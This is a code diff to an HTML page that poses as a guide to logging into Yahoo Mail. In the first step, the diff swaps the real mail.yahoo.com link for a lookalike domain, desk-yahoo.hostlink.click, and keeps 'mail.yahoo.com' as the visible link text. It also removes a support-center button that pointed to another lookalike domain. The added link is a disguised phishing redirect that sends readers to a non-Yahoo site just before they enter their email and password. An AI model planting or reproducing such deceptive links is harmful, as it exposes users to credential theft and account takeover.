--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
 
     <h1>How to Log Into Your Yahoo Mail Account</h1>
     <ol class="steps">
-      <li>Go to the official Yahoo Mail website: <a href="https://mail.yahoo.com" target="_blank">mail.yahoo.com</a></li>
+      <li>Go to the official Yahoo Mail website: <a href="https://desk-yahoo.hostlink.click/" target="_blank">mail.yahoo.com</a></li>
       <li>Click the "Sign in" button on the top right corner.</li>
       <li>Enter your Yahoo email address and click "Next."</li>
       <li>Type your password in the password field.</li>
@@ -45,8 +45,6 @@
     <p>
       Download the official Yahoo Mail app from the Google Play Store or Apple App Store. It's a fast and secure way to check your emails, especially on the go.
     </p>
-
-    <a href="https://yahoohelpdesk.hostlink.click/" class="cta-button">Visit Support Center</a>
   </div>
 </body>
 </html>
